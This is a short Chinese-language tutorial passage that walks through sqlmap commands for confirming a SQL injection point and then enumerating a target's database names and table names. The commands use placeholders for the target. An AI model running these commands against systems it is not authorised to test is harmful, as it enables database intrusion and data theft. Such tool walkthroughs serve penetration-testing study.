1、判断是否注入,进入cmd输入sqlmap.py -u 注入点 --form --level 3 --risk 2 ,若注入点中存在表单还需要添加--form;Parameter下有信息输出表示存在注入,可以看到检测出的注入类型(Type),数据库版本(Title)以及注入语句(Payload);
2、跑数据库名,输入sqlmap.py -u 注入点 --dbs --form --level 3 --risk 2 ;
3、跑表名,输入sqlmap.py -u 注入点 -D 库名 --tables --form --level 3 --risk 2 ;